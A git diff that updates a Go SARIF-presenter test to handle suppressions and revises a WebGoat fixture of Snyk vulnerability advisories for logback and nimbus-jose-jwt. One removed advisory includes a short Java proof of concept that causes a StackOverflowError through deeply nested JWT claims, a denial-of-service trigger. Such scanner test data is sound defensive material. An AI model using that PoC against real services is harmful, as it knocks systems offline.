diff --git a/internal/presenters/presenter_ufm_test.go b/internal/presenters/presenter_ufm_test.go
index 9e114339d..1ab090618 100644
--- a/internal/presenters/presenter_ufm_test.go
+++ b/internal/presenters/presenter_ufm_test.go
@@ -8,6 +8,7 @@ import (
 	"os"
 	"path/filepath"
 	"runtime"
+	"slices"
 	"sort"
 	"strings"
 	"testing"
@@ -251,18 +252,76 @@ func normalizeFixURIs(result map[string]interface{}) {
 }
 
 // normalizeSuppressions removes suppressions from results for consistent comparison
-func normalizeSuppressions(run map[string]interface{}) {
+//
+//nolint:gocyclo // to avoid repetition it's easier to read this way
+func normalizeSuppressions(run map[string]interface{}, ignoreSuppressions bool) {
 	results, ok := run["results"].([]interface{})
 	if !ok {
 		return
 	}
+
+	// just generally remove all suppressions available
+	if ignoreSuppressions {
+		for _, resultInterface := range results {
+			result, ok := resultInterface.(map[string]interface{})
+			if !ok {
+				continue
+			}
+			delete(result, "suppressions")
+		}
+		return
+	}
+
+	// otherwise use suppression information to remove rules and results to be comparable with the legacy output
+	var driver map[string]interface{}
+	var newRules []interface{}
+	var rules []interface{}
+	if tool, ok := run["tool"].(map[string]interface{}); ok {
+		if driver, ok = tool["driver"].(map[string]interface{}); ok {
+			if tmp, ok := driver["rules"].([]interface{}); ok {
+				rules = tmp
+			}
+		}
+	}
+
+	// create a new results slice
+	newResults := make([]interface{}, 0)
+	suppressedResults := []string{}
+
 	for _, resultInterface := range results {
 		result, ok := resultInterface.(map[string]interface{})
 		if !ok {
 			continue
 		}
-		delete(result, "suppressions")
+
+		if result["suppressions"] != nil {
+			ruleId, ok := result["ruleId"].(string)
+			if !ok {
+				continue
+			}
+			suppressedResults = append(suppressedResults, ruleId)
+			continue
+		}
+
+		newResults = append(newResults, resultInterface)
+	}
+
+	for _, rule := range rules {
+		if ruleAsMap, ok := rule.(map[string]interface{}); ok {
+			ruleId, ok := ruleAsMap["id"].(string)
+			if !ok {
+				continue
+			}
+			if slices.Contains(suppressedResults, ruleId) {
+				continue
+			}
+
+			newRules = append(newRules, rule)
+		}
 	}
+
+	run["results"] = newResults
+	driver["rules"] = newRules
 }
 
 // normalizeFixes keeps only fixes that are present in expected SARIF.
@@ -411,7 +470,7 @@ func sortTags(tags []interface{}) {
 
 // normalizeSarifForComparison removes or normalizes fields with known gaps
 // to allow testing of correctly implemented features while documenting TODOs
-func normalizeSarifForComparison(t *testing.T, sarifJSON string) map[string]interface{} {
+func normalizeSarifForComparison(t *testing.T, sarifJSON string, ignoreSuppressions bool) map[string]interface{} {
 	t.Helper()
 
 	var sarif map[string]interface{}
@@ -429,6 +488,9 @@ func normalizeSarifForComparison(t *testing.T, sarifJSON string) map[string]inte
 			continue
 		}
 
+		// Normalize suppressions (not included in original SARIF)
+		normalizeSuppressions(run, ignoreSuppressions)
+
 		// Normalize automation ID (missing project name in actual output)
 		normalizeAutomationID(run)
 
@@ -440,9 +502,6 @@ func normalizeSarifForComparison(t *testing.T, sarifJSON string) map[string]inte
 
 		// Normalize help content (test data may have different vulnerability descriptions)
 		normalizeHelpContent(run)
-
-		// Normalize suppressions (not included in original SARIF)
-		normalizeSuppressions(run)
 	}
 
 	return sarif
@@ -452,29 +511,34 @@ func Test_UfmPresenter_Sarif(t *testing.T) {
 	ri := runtimeinfo.New(runtimeinfo.WithName("snyk-cli"), runtimeinfo.WithVersion("1.1301.0"))
 
 	testCases := []struct {
-		name              string
-		expectedSarifPath string
-		testResultPath    string
+		name               string
+		expectedSarifPath  string
+		testResultPath     string
+		ignoreSuppressions bool
 	}{
 		{
-			name:              "cli",
-			expectedSarifPath: "testdata/ufm/original_cli.sarif",
-			testResultPath:    "testdata/ufm/testresult_cli.json",
+			name:               "cli",
+			expectedSarifPath:  "testdata/ufm/original_cli.sarif",
+			testResultPath:     "testdata/ufm/testresult_cli.json",
+			ignoreSuppressions: true,
 		},
 		{
-			name:              "webgoat",
-			expectedSarifPath: "testdata/ufm/webgoat.sarif.json",
-			testResultPath:    "testdata/ufm/webgoat.testresult.json",
+			name:               "webgoat",
+			expectedSarifPath:  "testdata/ufm/webgoat.sarif.json",
+			testResultPath:     "testdata/ufm/webgoat.testresult.json",
+			ignoreSuppressions: true,
 		},
 		{
-			name:              "webgoat with suppression",
-			expectedSarifPath: "testdata/ufm/webgoat.ignore.sarif.json",
-			testResultPath:    "testdata/ufm/webgoat.ignore.testresult.json",
+			name:               "webgoat_with_suppression",
+			expectedSarifPath:  "testdata/ufm/webgoat.ignore.sarif.json",
+			testResultPath:     "testdata/ufm/webgoat.ignore.testresult.json",
+			ignoreSuppressions: false,
 		},
 		{
-			name:              "multiproject",
-			expectedSarifPath: "testdata/ufm/multi_project.sarif.json",
-			testResultPath:    "testdata/ufm/multi_project.testresult.json",
+			name:               "multiproject",
+			expectedSarifPath:  "testdata/ufm/multi_project.sarif.json",
+			testResultPath:     "testdata/ufm/multi_project.testresult.json",
+			ignoreSuppressions: true,
 		},
 	}
 
@@ -501,8 +565,8 @@ func Test_UfmPresenter_Sarif(t *testing.T) {
 			validateSarifData(t, writer.Bytes())
 
 			// Normalize both expected and actual SARIF to ignore known gaps while testing implemented features
-			expectedNormalized := normalizeSarifForComparison(t, string(expectedSarifBytes))
-			actualNormalized := normalizeSarifForComparison(t, writer.String())
+			expectedNormalized := normalizeSarifForComparison(t, string(expectedSarifBytes), tc.ignoreSuppressions)
+			actualNormalized := normalizeSarifForComparison(t, writer.String(), tc.ignoreSuppressions)
 
 			// Normalize fixes to only keep fixes that are present in expected SARIF
 			normalizeFixes(t, expectedNormalized, actualNormalized)
@@ -528,7 +592,7 @@ func Test_UfmPresenter_Sarif(t *testing.T) {
 				if err := os.WriteFile(fmt.Sprintf("/tmp/%s_actual_normalized.json", tc.name), actualJSON, 0644); err != nil {
 					t.Logf("Failed to write actual output: %v", err)
 				}
-				t.Log("Wrote normalized outputs to /tmp/expected_normalized.json and /tmp/actual_normalized.json for debugging")
+				t.Logf("Wrote normalized outputs to /tmp/%s_expected_normalized.json and /tmp/%s_actual_normalized.json for debugging", tc.name, tc.name)
 			}
 		})
 	}
diff --git a/internal/presenters/testdata/ufm/webgoat.ignore.sarif.json b/internal/presenters/testdata/ufm/webgoat.ignore.sarif.json
index 2d943bb42..4c180d399 100644
--- a/internal/presenters/testdata/ufm/webgoat.ignore.sarif.json
+++ b/internal/presenters/testdata/ufm/webgoat.ignore.sarif.json
@@ -19,218 +19,33 @@
                 "text": "Medium severity - External Initialization of Trusted Variables or Data Stores vulnerability in ch.qos.logback:logback-core"
               },
               "fullDescription": {
-                "text": "(CVE-2025-11226) ch.qos.logback:logback-core@1.4.11"
+                "text": "(CVE-2025-11226) ch.qos.logback:logback-core@1.5.18"
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11 › ch.qos.logback:logback-core@1.4.11\n# Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to External Initialization of Trusted Variables or Data Stores via the conditional processing of the `logback.xml` configuration file when both the Janino library and Spring Framework are present on the class path. An attacker can execute arbitrary code by compromising an existing configuration file or injecting a malicious environment variable before program execution. This is only exploitable if the attacker has write access to a configuration file or can set a malicious environment variable.\n# Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.5.19 or higher.\n# References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7)\n- [Release Notes](https://logback.qos.ch/news.html#1.5.19)\n"
+                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.5.6 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2025.4-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.5.6 › org.springframework.boot:spring-boot-starter@3.5.6 › org.springframework.boot:spring-boot-starter-logging@3.5.6 › ch.qos.logback:logback-classic@1.5.18 › ch.qos.logback:logback-core@1.5.18\n# Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to External Initialization of Trusted Variables or Data Stores via the conditional processing of the `logback.xml` configuration file when both the Janino library and Spring Framework are present on the class path. An attacker can execute arbitrary code by compromising an existing configuration file or injecting a malicious environment variable before program execution. This is only exploitable if the attacker has write access to a configuration file or can set a malicious environment variable.\n# Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.5.19 or higher.\n# References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/61f6a2544f36b3016e0efd434ee21f19269f1df7)\n- [Release Notes](https://logback.qos.ch/news.html#1.5.19)\n"
               },
               "properties": {
-                "tags": [
-                  "security",
-                  "CWE-454",
-                  "maven"
-                ],
+                "tags": ["security", "CWE-454", "maven"],
                 "cvssv3_baseScore": 5.9,
                 "security-severity": "5.9"
               }
             },
             {
-              "id": "SNYK-JAVA-CHQOSLOGBACK-6094942",
-              "shortDescription": {
-                "text": "High severity - Denial of Service (DoS) vulnerability in ch.qos.logback:logback-classic"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-6378) ch.qos.logback:logback-classic@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-classic\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11\n# Overview\n[ch.qos.logback:logback-classic](https://mvnrepository.com/artifact/ch.qos.logback/logback-classic) is a reliable, generic, fast and flexible logging library for Java.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can mount a denial-of-service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `ch.qos.logback:logback-classic` to version 1.2.13, 1.3.12, 1.4.12 or higher.\n# References\n- [Changelog](https://logback.qos.ch/news.html#1.3.12)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/9c782b45be4abdafb7e17481e24e7354c2acd1eb)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b8eac23a9de9e05fb6d51160b3f46acd91af9731)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.1,
-                "security-severity": "7.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-CHQOSLOGBACK-6094943",
-              "shortDescription": {
-                "text": "High severity - Denial of Service (DoS) vulnerability in ch.qos.logback:logback-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-6378) ch.qos.logback:logback-core@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11 › ch.qos.logback:logback-core@1.4.11\n# Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). An attacker can mount a denial-of-service attack by sending poisoned data. This is only exploitable if logback receiver component is deployed.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.2.13, 1.3.12, 1.4.12 or higher.\n# References\n- [Changelog](https://logback.qos.ch/news.html#1.3.12)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/9c782b45be4abdafb7e17481e24e7354c2acd1eb)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b8eac23a9de9e05fb6d51160b3f46acd91af9731)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.1,
-                "security-severity": "7.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-CHQOSLOGBACK-6097492",
-              "shortDescription": {
-                "text": "High severity - Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability in ch.qos.logback:logback-classic"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-6481) ch.qos.logback:logback-classic@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-classic\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11\n# Overview\n[ch.qos.logback:logback-classic](https://mvnrepository.com/artifact/ch.qos.logback/logback-classic) is a reliable, generic, fast and flexible logging library for Java.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the `logback receiver` component. An attacker can mount a denial-of-service attack by sending poisoned data.\r\n\r\n**Note:**\r\n\r\nSuccessful exploitation requires the logback-receiver component being enabled and also reachable by the attacker.\n# Remediation\nUpgrade `ch.qos.logback:logback-classic` to version 1.2.13, 1.3.14, 1.4.14 or higher.\n# References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/7018a3609c7bcc9dc7bf5903509901a986e5f578)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/c612b2fa3caf6eef3c75f1cd5859438451d0fd6f)\n- [Release Notes](https://logback.qos.ch/news.html#1.2.13)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.14)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.1,
-                "security-severity": "7.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-CHQOSLOGBACK-6097493",
-              "shortDescription": {
-                "text": "High severity - Uncontrolled Resource Consumption ('Resource Exhaustion') vulnerability in ch.qos.logback:logback-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2023-6481) ch.qos.logback:logback-core@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11 › ch.qos.logback:logback-core@1.4.11\n# Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') via the `logback receiver` component. An attacker can mount a denial-of-service attack by sending poisoned data.\r\n\r\n**Note:**\r\n\r\nSuccessful exploitation requires the logback-receiver component being enabled and also reachable by the attacker.\n# Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.2.13, 1.3.14, 1.4.14 or higher.\n# References\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/7018a3609c7bcc9dc7bf5903509901a986e5f578)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/bb095154be011267b64e37a1d401546e7cc2b7c3)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/c612b2fa3caf6eef3c75f1cd5859438451d0fd6f)\n- [Release Notes](https://logback.qos.ch/news.html#1.2.13)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.14)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-400",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 7.1,
-                "security-severity": "7.1"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-CHQOSLOGBACK-8539865",
-              "shortDescription": {
-                "text": "Low severity - Server-side Request Forgery (SSRF) vulnerability in ch.qos.logback:logback-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-12801) ch.qos.logback:logback-core@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11 › ch.qos.logback:logback-core@1.4.11\n# Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Server-side Request Forgery (SSRF) through the `SaxEventRecorder` process. An attacker can forge requests by compromising logback configuration files in XML.\n# Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.3.15, 1.5.13 or higher.\n# References\n- [Additional Information](https://logback.qos.ch/news.html#1.5.13)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/2863a4974a3649b5b00d4a529ee6ff2063470f35)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/5f05041cba4c4ac0a62748c5c527a2da48999f2d)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.15)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-918",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 2.4,
-                "security-severity": "2.4"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-CHQOSLOGBACK-8539866",
-              "shortDescription": {
-                "text": "Medium severity - Improper Neutralization of Special Elements vulnerability in ch.qos.logback:logback-core"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-12798) ch.qos.logback:logback-core@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-core\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11 › ch.qos.logback:logback-core@1.4.11\n# Overview\n[ch.qos.logback:logback-core](https://mvnrepository.com/artifact/ch.qos.logback/logback-core) is a logback-core module.\n\nAffected versions of this package are vulnerable to Improper Neutralization of Special Elements via the `JaninoEventEvaluator` extension. An attacker can execute arbitrary code by compromising an existing logback configuration file or injecting an environment variable before program execution.\n# Remediation\nUpgrade `ch.qos.logback:logback-core` to version 1.3.15, 1.5.13 or higher.\n# References\n- [Additional Information](https://logback.qos.ch/news.html#1.5.13)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/2cb6d520df7592ef1c3a198f1b5df3c10c93e183)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b44b940cc7d4839e06e31a7d60dca174b99c1aa5)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.15)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-138",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 5.9,
-                "security-severity": "5.9"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-CHQOSLOGBACK-8539867",
-              "shortDescription": {
-                "text": "Medium severity - Improper Neutralization of Special Elements vulnerability in ch.qos.logback:logback-classic"
-              },
-              "fullDescription": {
-                "text": "(CVE-2024-12798) ch.qos.logback:logback-classic@1.4.11"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: ch.qos.logback:logback-classic\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-validation@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-validation@3.1.5 › org.springframework.boot:spring-boot-starter@3.1.5 › org.springframework.boot:spring-boot-starter-logging@3.1.5 › ch.qos.logback:logback-classic@1.4.11\n# Overview\n[ch.qos.logback:logback-classic](https://mvnrepository.com/artifact/ch.qos.logback/logback-classic) is a reliable, generic, fast and flexible logging library for Java.\n\nAffected versions of this package are vulnerable to Improper Neutralization of Special Elements via the `JaninoEventEvaluator` extension. An attacker can execute arbitrary code by compromising an existing logback configuration file or injecting an environment variable before program execution.\n# Remediation\nUpgrade `ch.qos.logback:logback-classic` to version 1.3.15, 1.5.13 or higher.\n# References\n- [Additional Information](https://logback.qos.ch/news.html#1.5.13)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/2cb6d520df7592ef1c3a198f1b5df3c10c93e183)\n- [GitHub Commit](https://github.com/qos-ch/logback/commit/b44b940cc7d4839e06e31a7d60dca174b99c1aa5)\n- [Release Notes](https://logback.qos.ch/news.html#1.3.15)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-138",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 5.9,
-                "security-severity": "5.9"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-COMNIMBUSDS-10691768",
-              "shortDescription": {
-                "text": "Medium severity - Uncontrolled Recursion vulnerability in com.nimbusds:nimbus-jose-jwt"
-              },
-              "fullDescription": {
-                "text": "(CVE-2025-53864) com.nimbusds:nimbus-jose-jwt@9.24.4"
-              },
-              "help": {
-                "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.nimbusds:nimbus-jose-jwt\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 › org.springframework.security:spring-security-oauth2-jose@6.1.5 › com.nimbusds:nimbus-jose-jwt@9.24.4\n# Overview\n[com.nimbusds:nimbus-jose-jwt](https://connect2id.com/products/nimbus-jose-jwt) is a library for JSON Web Tokens (JWT)\n\nAffected versions of this package are vulnerable to Uncontrolled Recursion due to the improper handling JWT claim sets containing deeply nested JSON objects. An attacker can cause application downtime or resource exhaustion by submitting a specially crafted JWT with excessive nesting.\r\n\r\n**Note:**\r\n\r\nThis issue only affects `nimbus-jose-jwt`, not `Gson` because the Connect2id product could have checked the JSON object nesting depth, regardless of what limits (if any) were imposed by Gson.\n# PoC\n```java\r\nimport com.nimbusds.jwt.JWTClaimsSet;\r\nimport java.text.ParseException;\r\nimport java.util.HashMap;\r\nimport java.util.Map;\r\n\r\npublic class Test {\r\n    // This builds a claimset with a deeply nested map, which could theoretically be supplied by a client.\r\n    // If the JWT is serialized into JSON (for example, in logging or debugging), it can cause a StackOverflowError.\r\n    public static void main(String[] args) throws ParseException {        \r\n        Map<String, Object> nestedMap = new HashMap<>();\r\n        Map<String, Object> currentLevel = nestedMap;\r\n\r\n        for (int i = 0; i < 5000; i++) {\r\n            Map<String, Object> nextLevel = new HashMap<>();\r\n            currentLevel.put(\"\", nextLevel);\r\n            currentLevel = nextLevel;\r\n        }\r\n\r\n        JWTClaimsSet claimSet = JWTClaimsSet.parse(nestedMap);\r\n\r\n        // This will cause a StackOverflowError due to excessive recursion in GSON's serialization\r\n        claimSet.toString();\r\n    }\r\n}\r\n```\n# Remediation\nUpgrade `com.nimbusds:nimbus-jose-jwt` to version 9.37.4, 10.0.2 or higher.\n# References\n- [Bitbucket Commit](https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/393a96fd858a5a74276158ca9740b67ca9484b4d)\n- [Bitbucket Issue](https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/583/stackoverflowerror-due-to-deeply-nested)\n- [Bitbucket Issue](https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/593/back-port-cve-2025-53864-fix-to-9x-branch)\n- [GitHub Commit](https://github.com/google/gson/commit/1039427ff0100293dd3cf967a53a55282c0fef6b)\n"
-              },
-              "properties": {
-                "tags": [
-                  "security",
-                  "CWE-674",
-                  "maven"
-                ],
-                "cvssv3_baseScore": 6.9,
-                "security-severity": "6.9"
-              }
-            },
-            {
-              "id": "SNYK-JAVA-COMNIMBUSDS-6247633",
+              "id": "snyk:lic:maven:ch.qos.logback:logback-core:(EPL-1.0_OR_LGPL-2.1)",
               "shortDescription": {
-                "text": "High severity - Allocation of Resources Without Limits or Throttling vulnerability in com.nimbusds:nimbus-jose-jwt"
+                "text": "Medium severity - Dual license: EPL-1.0, LGPL-2.1 vulnerability in ch.qos.logback:logback-core"
               },
               "fullDescription": {
-                "text": "(CVE-2023-52428) com.nimbusds:nimbus-jose-jwt@9.24.4"
+                "text": "ch.qos.logback:logback-core@1.5.18"
               },
               "help": {
                 "text": "",
-                "markdown": "* Package Manager: maven\n* Vulnerable module: com.nimbusds:nimbus-jose-jwt\n* Introduced through: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT, org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 and others\n### Detailed paths\n* _Introduced through_: org.owasp.webgoat:webgoat@2023.5-SNAPSHOT › org.springframework.boot:spring-boot-starter-oauth2-client@3.1.5 › org.springframework.security:spring-security-oauth2-jose@6.1.5 › com.nimbusds:nimbus-jose-jwt@9.24.4\n# Overview\n[com.nimbusds:nimbus-jose-jwt](https://connect2id.com/products/nimbus-jose-jwt) is a library for JSON Web Tokens (JWT)\n\nAffected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to a large JWE `p2c` header value (AKA iteration count) for the `PasswordBasedDecrypter` (PBKDF2) class. An attacker can cause resource consumption by specifying an excessively large iteration count.\n# Remediation\nUpgrade `com.nimbusds:nimbus-jose-jwt` to version 9.37.2 or higher.\n# References\n- [Bitbucket Commit](https://bitbucket.org/connect2id/nimbus-jose-jwt/commits/3b3b77e)\n- [Bitbucket Issue](https://bitbucket.org/connect2id/nimbus-jose-jwt/issues/526/)\n"
